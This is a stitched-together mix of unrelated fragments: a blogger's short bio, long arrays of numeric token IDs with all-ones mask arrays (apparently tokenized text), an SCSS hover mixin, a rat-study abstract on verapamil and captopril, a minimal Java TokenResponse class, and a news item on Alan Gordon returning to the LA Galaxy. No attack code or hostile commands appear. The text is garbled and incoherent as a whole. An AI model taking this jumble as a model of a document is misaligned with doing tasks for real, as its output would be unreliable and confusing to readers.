technocrack teenager and I love to blog down at my blog,BloggerTank. I'm a big Google Fan and I love to posting for my blog so that some people can benefit from little tweaks which may enhance their productivity skills with blogging
[ 1, 498, 1295, 3250, 29892, 29871, 29955, 3786, 29871, 29906, 29900, 29896, 29896, 13, 13, 5618, 526, 2740, 6012, 13883, 8492, 29892, 1856, 6207, 8492, 29892, 5087, 1813, 7115, 1423, 261, 29892, 3725, 29949, 8492, 29892, 322, 920, 508, 1438, 8986, 8492, 1371, 304, 6963, 901, 11029, 12469, 304, 596, 350, 1188, 29973, 1670, 526, 1784, 3889, 7395, 1856, 8492, 393, 1856, 6207, 29879, 508, 671, 304, 1284, 714, 901, 2472, 1048, 1009, 11840, 29889, 450, 8492, 508, 884, 6655, 278, 1856, 6207, 29879, 304, 1950, 4828, 2740, 24000, 1122, 505, 411, 278, 3268, 29915, 29879, 4472, 11561, 322, 2874, 29889, 2266, 29892, 591, 4091, 29892, 363, 278, 14169, 310, 1749, 716, 12618, 5743, 29892, 5649, 920, 1438, 1856, 6207, 8492, 1795, 1371, 11157, 596, 4700, 29915, 29879, 9305, 22125, 13035, 856, 13, 13, 7974, 10863, 20693, 326, 2133, 13, 13, 4806, 4529, 11856, 10863, 20693, 326, 2133, 408, 785, 263, 1158, 470, 1889, 310, 4857, 1747, 322, 5994, 5281, 278, 24034, 310, 263, 4700, 297, 2740, 6012, 2582, 29889, 13, 13, 3047, 14746, 310, 6515, 310, 2740, 2582, 363, 738, 2183, 13553, 29892, 1856, 6207, 29879, 723, 864, 304, 505, 1009, 4700, 2615, 4249, 278, 937, 7303, 310, 2740, 1121, 1051, 886, 29889, 450, 6133, 278, 2602, 470, 24034, 29892, 278, 7621, 278, 4188, 22342, 393, 8986, 4160, 674, 6493, 596, 3268, 29889, 910, 11856, 10863, 20693, 326, 2133, 313, 272, 3725, 29949, 29897, 6964, 338, 694, 1422, 515, 263, 28645, 29899, 392, 29899, 29720, 279, 18296, 988, 4423, 322, 26401, 6602, 920, 1784, 20330, 674, 1209, 491, 278, 18296, 322, 27581, 5768, 297, 363, 263, 6493, 29889, 1551, 278, 8986, 29892, 596, 6901, 3268, 16964, 1960, 263, 1781, 4423, 322, 26401, 29892, 322, 3725, 29949, 8799, 1934, 4658, 896, 1073, 920, 304, 6176, 393, 29889, 13, 13, 29933, 1188, 18862, 322, 11856, 10863, 2391, 886, 13, 13, 13555, 2534, 6369, 263, 350, 1188, 470, 4700, 29892, 278, 937, 2655, 304, 437, 338, 304, 1207, 1854, 393, 278, 2472, 1104, 1218, 304, 278, 3268, 338, 3625, 373, 278, 8986, 29889, 2563, 8797, 3842, 29892, 350, 1188, 8797, 3842, 322, 11856, 2201, 1475, 526, 278, 8986, 612, 4743, 349, 1179, 29889, 8512, 278, 4655, 11856, 2201, 1475, 674, 29349, 29880, 596, 4700, 1584, 1728, 738, 3158, 373, 596, 760, 29892, 372, 674, 367, 1568, 8473, 565, 366, 1033, 410, 627, 3598, 3867, 963, 596, 3268, 2472, 29889, 1334, 750, 3971, 7456, 373, 920, 322, 988, 304, 9752, 278, 12618, 2472, 577, 408, 304, 505, 596, 3268, 8072, 27541, 322, 2615, 297, 1784, 7600, 373, 278, 8986, 29889, 13, 13, 20475, 3725, 29949, 27564, 13, 13, 13555, 366, 505, 18397, 596, 4700, 29915, 29879, 848, 304, 599, 278, 2740, 24000, 322, 17525, 29892, 366, 881, 367, 2221, 304, 1284, 596, 3268, 9051, 373, 278, 8986, 29889, 960, 366, 437, 263, 13553, 2740, 373, 596, 4700, 29915, 29879, 11261, 29892, 366, 1122, 1284, 1784, 916, 1051, 886, 297, 278, 2740, 2582, 14432, 310, 15850, 29889, 4525, 526, 278, 11840, 607, 505, 2253, 1813, 27871, 322, 526, 27545, 363, 278, 2740, 24000, 29889, 887, 508, 24656, 596, 12618, 470, 4700, 2086, 29889, 13, 13, 1762, 13978, 5381, 29892, 1784, 3725, 29949, 11840, 505, 1925, 701, 777, 310, 1009, 3725, 29949, 8492, 363, 3889, 29889, 422, 1050, 1455, 11840, 607, 526, 10676, 297, 24507, 304, 10784, 29890, 701, 278, 2740, 24034, 674, 5146, 278, 3725, 29949, 8799, 1934, 363, 901, 995, 29899, 23959, 5786, 29889, 960, 366, 526, 763, 502, 29892, 12618, 3460, 714, 310, 2090, 322, 15935, 29892, 372, 1795, 367, 2253, 304, 671, 871, 278, 3889, 5786, 363, 263, 1369, 29889, 13, 13, 29903, 12981, 2868, 3725, 29949, 27564, 13, 13, 14804, 310, 278, 3725, 29949, 1856, 6207, 11840, 505, 2788, 3889, 8492, 322, 5786, 29889, 887, 508, 1018, 738, 310, 963, 29892, 2466, 278, 697, 393, 591, 763, 338, 474, 3609, 12229, 29889, 512, 2114, 29892, 896, 505, 263, 1544, 14523, 1824, 607, 366, 1122, 864, 304, 1423, 714, 29889, 17302, 278, 3725, 29949, 27564, 29892, 278, 6743, 591, 1284, 5407, 297, 599, 1438, 11840, 526, 13018, 13, 13, 5841, 2324, 5399, 261, 785, 319, 1051, 310, 11840, 393, 505, 9024, 304, 596, 12618, 470, 4700, 29889, 9305, 29934, 804, 338, 18425, 10087, 491, 278, 1353, 322, 11029, 310, 2988, 304, 596, 3268, 29889, 2598, 2105, 445, 322, 366, 508, 3117, 4140, 825, 596, 9305, 29934, 804, 12722, 304, 367, 29889, 13, 13, 29857, 1717, 6645, 5399, 261, 785, 319, 1106, 472, 607, 310, 278, 2988, 297, 596, 3268, 526, 13330, 304, 10240, 470, 1661, 29899, 735, 9696, 24295, 29889, 15950, 2086, 1784, 714, 9715, 322, 9391, 2988, 373, 596, 1856, 1813, 1122, 3805, 768, 403, 451, 871, 278, 22176, 541, 278, 2740, 805, 11376, 29889, 1938, 445, 3699, 17462, 292, 2748, 297, 263, 1550, 304, 3349, 278, 4319, 2988, 29889, 13, 13, 14207, 9305, 29934, 804, 5399, 261, 785, 450, 5087, 9305, 29934, 804, 310, 596, 3268, 29889, 887, 508, 884, 5142, 18129, 2911, 14418, 411, 5087, 21704, 1646, 304, 1776, 278, 5087, 9305, 29934, 1331, 310, 599, 278, 11840, 393, 366, 6493, 29889, 13, 13, 14207, 9305, 29934, 804, 21099, 2463, 785, 319, 5434, 5087, 9305, 29934, 804, 18988, 29889, 960, 366, 526, 27116, 304, 1073, 29892, 1438, 11840, 508, 2367, 366, 263, 6534, 12678, 310, 596, 5434, 9305, 29934, 804, 29889, 13, 13, 7020, 20693, 326, 3950, 785, 319, 5941, 701, 310, 596, 4544, 2752, 775, 29889, 1522, 16010, 746, 366, 3394, 278, 7829, 3620, 2466, 29889, 29849, 1781, 304, 16199, 278, 4472, 1434, 3907, 738, 21733, 29889, 13, 13, 3220, 5399, 261, 785, 9681, 310, 6515, 310, 596, 4700, 393, 526, 27541, 491, 2740, 24000, 29889, 960, 6515, 526, 4567, 515, 278, 2380, 29892, 1018, 11834, 5367, 596, 269, 667, 481, 1449, 29889, 13, 13, 2558, 1742, 360, 575, 537, 5399, 261, 785, 450, 13553, 4978, 297, 596, 24499, 29889, 910, 674, 491, 322, 2919, 9949, 278, 2656, 310, 2087, 29879, 393, 2087, 29903, 1947, 674, 2058, 373, 596, 3268, 29889, 13, 13, 2558, 1742, 25589, 7118, 272, 785, 317, 12981, 2868, 5972, 29361, 363, 596, 4700, 29889, 23606, 297, 3458, 1438, 29361, 746, 5007, 470, 16278, 596, 11803, 29889, 13, 13, 19346, 29899, 11338, 3251, 1061, 785, 20999, 310, 4700, 29915, 29879, 12700, 29899, 11338, 29889, 323, 737, 272, 263, 13907, 6139, 322, 731, 310, 29361, 304, 367, 15478, 964, 278, 4472, 29889, 13, 13, 1123, 455, 771, 1052, 6645, 5399, 261, 785, 319, 1423, 304, 1074, 565, 278, 22056, 297, 596, 12618, 1245, 29879, 470, 1544, 14523, 526, 25236, 304, 366, 29889, 13, 13, 5592, 1241, 3439, 9183, 785, 450, 1813, 8118, 408, 3595, 491, 263, 2740, 6012, 805, 1241, 29889, 3834, 1122, 2367, 366, 263, 2867, 3204, 310, 278, 15574, 1304, 29361, 297, 596, 3268, 29889, 13, 13, 5323, 2416, 12367, 29879, 785, 319, 10230, 310, 596, 3268, 29915, 29879, 322, 916, 5100, 2105, 11840, 29915, 12469, 4955, 18445, 297, 4827, 29874, 29889, 13, 13, 3609, 2746, 24839, 4321, 785, 24839, 310, 4700, 1813, 2254, 29889, 960, 366, 1284, 278, 10203, 7078, 328, 931, 263, 2217, 1472, 29892, 2125, 777, 15366, 304, 505, 263, 383, 1901, 2563, 9305, 16012, 5974, 29889, 13, 13, 17875, 4918, 29879, 13, 13, 2517, 1522, 16887, 910, 350, 1188, 13, 13, 11284, 306, 29915, 29885, 263, 5722, 542, 22282, 734, 264, 1875, 322, 306, 5360, 304, 12618, 1623, 472, 590, 12618, 29892, 29933, 21707, 29911, 804, 29889, 306, 29915, 29885, 263, 4802, 5087, 383, 273, 322, 306, 5360, 304, 16742, 363, 590, 12618, 577, 393, 777, 2305, 508, 14169, 515, 2217, 7780, 10327, 607, 1122, 26371, 749, 1009, 3234, 2068, 25078, 411, 12618, 3460 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
/* Reveal */ @mixin reveal { $duration: #{$fastDuration}; @include hacks(); position: relative; overflow: hidden; &:before { content: ""; position: absolute; z-index: -1; left: 0; right: 0; top: 0; bottom: 0; border-color: #{$activeColor}; border-style: solid; border-width: 0; @include prefixed(transition-property, border-width); @include prefixed(transition-duration, #{$duration}); @include prefixed(transition-timing-function, ease-out); } &:hover, &:focus, &:active { &:before { @include prefixed(transform, translateY(0)); border-width: 4px; } } }
[ 1, 4949, 830, 345, 284, 29722, 13, 29992, 28084, 262, 10320, 284, 3336, 13, 12, 29938, 19708, 29901, 396, 8290, 11255, 18984, 29913, 2104, 13, 30004, 13, 12, 29992, 2856, 447, 4684, 14078, 13, 12, 3283, 29901, 6198, 2104, 13, 12, 2262, 29901, 7934, 2104, 13, 30004, 13, 12, 29987, 29901, 11083, 3336, 13, 12, 12, 3051, 29901, 12942, 30004, 13, 12, 12, 3283, 29901, 8380, 2104, 13, 12, 12, 29920, 29899, 2248, 29901, 448, 29896, 2104, 13, 12, 12, 1563, 29901, 29871, 29900, 2104, 13, 12, 12, 1266, 29901, 29871, 29900, 2104, 13, 12, 12, 3332, 29901, 29871, 29900, 2104, 13, 12, 12, 8968, 29901, 29871, 29900, 2104, 13, 12, 12, 11466, 29899, 2780, 29901, 396, 8290, 4925, 3306, 29913, 2104, 13, 12, 12, 11466, 29899, 3293, 29901, 7773, 2104, 13, 12, 12, 11466, 29899, 2103, 29901, 29871, 29900, 2104, 13, 12, 12, 29992, 2856, 10944, 287, 29898, 20543, 29899, 6799, 29892, 5139, 29899, 2103, 6075, 13, 12, 12, 29992, 2856, 10944, 287, 29898, 20543, 29899, 19708, 29892, 396, 8290, 19708, 3680, 30004, 13, 12, 12, 29992, 2856, 10944, 287, 29898, 20543, 29899, 9346, 292, 29899, 2220, 29892, 16326, 29899, 449, 6075, 13, 12, 8117, 13, 30004, 13, 12, 29987, 29901, 13194, 11167, 13, 12, 29987, 29901, 18037, 11167, 13, 12, 29987, 29901, 4925, 3336, 13, 30004, 13, 12, 12, 29987, 29901, 11083, 3336, 13, 12, 12, 12, 29992, 2856, 10944, 287, 29898, 9067, 29892, 14240, 29979, 29898, 29900, 2483, 30004, 13, 12, 12, 12, 11466, 29899, 2103, 29901, 29871, 29946, 1756, 2104, 13, 12, 12, 8117, 13, 12, 8117, 13, 8117, 13 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Effects of verapamil alone and with captopril on blood pressure and bilateral renal function in Goldblatt hypertensive rats. The effects of verapamil infusion alone and superimposed with captopril on arterial pressure and bilateral renal function were evaluated in 21 two-kidney, one-clip Goldblatt hypertensive rats and in 13 control rats. Verapamil significantly decreased arterial pressure of both hypertensive and control rats. Addition of captopril further reduced arterial pressure in hypertensive rats only. There were significant increases in glomerular filtration rate (GFR), urine flow and absolute and fractional excretory rates of sodium and potassium in the non-clipped kidney. In contrast, these renal indices decreased in the clipped kidney. Superimposed captopril during verapamil infusion did not significantly change function of the non-clipped kidney but further depressed function of the clipped kidney. In control rats, no significant change in GFR occurred in response to drugs. Renal excretion of water and sodium, but not potassium, increased after verapamil. However, the diuresis and natriuresis were less pronounced than those seen in the non-clipped kidney of hypertensive rats. There was a proportionate increase in osmolar clearance and free water reabsorption rate in the non-clipped kidney and the normal kidney. The linear relationship did not change after verapamil infusion. The results suggest that verapamil enhances the excretory function of the non-clipped kidney of Goldblatt hypertensive rats via increased GFR and decreased tubular reabsorption in the proximal and/or distal tubules despite its hypotensive action.
[ 1, 26475, 29879, 310, 1147, 481, 1344, 7432, 322, 411, 4332, 459, 4115, 373, 10416, 12959, 322, 13181, 1008, 284, 4325, 284, 740, 297, 6650, 22801, 7498, 10700, 6270, 364, 1446, 29889, 13, 1576, 9545, 310, 1147, 481, 1344, 3041, 3958, 7432, 322, 2428, 326, 4752, 411, 4332, 459, 4115, 373, 564, 357, 616, 12959, 322, 13181, 1008, 284, 4325, 284, 740, 892, 19030, 297, 29871, 29906, 29896, 1023, 29899, 29895, 333, 3801, 29892, 697, 29899, 24049, 6650, 22801, 7498, 10700, 6270, 364, 1446, 322, 297, 29871, 29896, 29941, 2761, 364, 1446, 29889, 1798, 481, 1344, 16951, 9263, 1463, 564, 357, 616, 12959, 310, 1716, 7498, 10700, 6270, 322, 2761, 364, 1446, 29889, 3462, 654, 310, 4332, 459, 4115, 4340, 12212, 564, 357, 616, 12959, 297, 7498, 10700, 6270, 364, 1446, 871, 29889, 1670, 892, 7282, 16415, 297, 3144, 12392, 1070, 977, 509, 362, 6554, 313, 29954, 15860, 511, 5065, 457, 4972, 322, 8380, 322, 15958, 284, 429, 4838, 706, 19257, 310, 20892, 1974, 322, 3104, 465, 1974, 297, 278, 1661, 29899, 11303, 2986, 26397, 3801, 29889, 512, 12814, 29892, 1438, 4325, 284, 16285, 9263, 1463, 297, 278, 9335, 2986, 26397, 3801, 29889, 5670, 326, 4752, 4332, 459, 4115, 2645, 1147, 481, 1344, 3041, 3958, 1258, 451, 16951, 1735, 740, 310, 278, 1661, 29899, 11303, 2986, 26397, 3801, 541, 4340, 316, 13120, 740, 310, 278, 9335, 2986, 26397, 3801, 29889, 512, 2761, 364, 1446, 29892, 694, 7282, 1735, 297, 402, 15860, 10761, 297, 2933, 304, 5883, 3174, 29889, 7493, 284, 429, 4838, 291, 310, 4094, 322, 20892, 1974, 29892, 541, 451, 3104, 465, 1974, 29892, 11664, 1156, 1147, 481, 1344, 29889, 2398, 29892, 278, 652, 1973, 275, 322, 14033, 374, 1973, 275, 892, 3109, 11504, 20979, 1135, 1906, 3595, 297, 278, 1661, 29899, 11303, 2986, 26397, 3801, 310, 7498, 10700, 6270, 364, 1446, 29889, 1670, 471, 263, 18618, 403, 7910, 297, 2897, 29885, 10170, 2821, 749, 322, 3889, 4094, 337, 6897, 272, 683, 6554, 297, 278, 1661, 29899, 11303, 2986, 26397, 3801, 322, 278, 4226, 26397, 3801, 29889, 450, 5608, 9443, 1258, 451, 1735, 1156, 1147, 481, 1344, 3041, 3958, 29889, 450, 2582, 4368, 393, 1147, 481, 1344, 26371, 2925, 278, 429, 4838, 706, 740, 310, 278, 1661, 29899, 11303, 2986, 26397, 3801, 310, 6650, 22801, 7498, 10700, 6270, 364, 1446, 3025, 11664, 402, 15860, 322, 9263, 1463, 23131, 1070, 337, 6897, 272, 683, 297, 278, 23203, 284, 322, 29914, 272, 1320, 284, 23131, 2540, 15020, 967, 10163, 327, 6270, 3158, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
package com.futureprocessing.spring.infrastructure.security; import com.fasterxml.jackson.annotation.JsonProperty; public class TokenResponse { @JsonProperty private String token; public TokenResponse() { } public TokenResponse(String token) { this.token = token; } }
[ 1, 3577, 419, 29889, 29888, 9130, 19170, 29889, 4278, 29889, 262, 14867, 12425, 29889, 8926, 29936, 13, 13, 5215, 419, 29889, 29888, 1901, 3134, 29889, 21452, 1100, 29889, 18317, 29889, 8148, 4854, 29936, 13, 13, 3597, 770, 25159, 5103, 426, 13, 1678, 732, 8148, 4854, 13, 1678, 2024, 1714, 5993, 29936, 13, 13, 1678, 970, 25159, 5103, 580, 426, 13, 1678, 500, 13, 13, 1678, 970, 25159, 5103, 29898, 1231, 5993, 29897, 426, 13, 4706, 445, 29889, 6979, 353, 5993, 29936, 13, 1678, 500, 13, 29913, 13 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Post navigation Long Beach’s Alan Gordon returns to Galaxy from San Jose Earthquakes A decade after he was first drafted by the Galaxy and scored just 16 goals in 80 appearances over six years, the Galaxy gave the Earthquakes an unspecified amount of allocation money today to re-acquire forward Alan Gordan. “Alan is a proven MLS player who adds another scoring threat to our roster,” coach Bruce Arena said. Optimistic, isn’t he? Gordon, now 32, scored 23 goals with San Jose and had stints with Toronto and Chivas USA. Meta Comments policy We invite you to use our commenting platform to engage in insightful conversations about issues in our community. Although we do not pre-screen comments, we reserve the right at all times to remove any information or materials that are unlawful, threatening, abusive, libelous, defamatory, obscene, vulgar, pornographic, profane, indecent or otherwise objectionable to us, and to disclose any information necessary to satisfy the law, regulation, or government request. We might permanently block any user who abuses these conditions. If you see comments that you find offensive, please use the “Flag as Inappropriate” feature by hovering over the right side of the post, and pulling down on the arrow that appears. Or, contact our editors by emailing moderator@langnews.com.
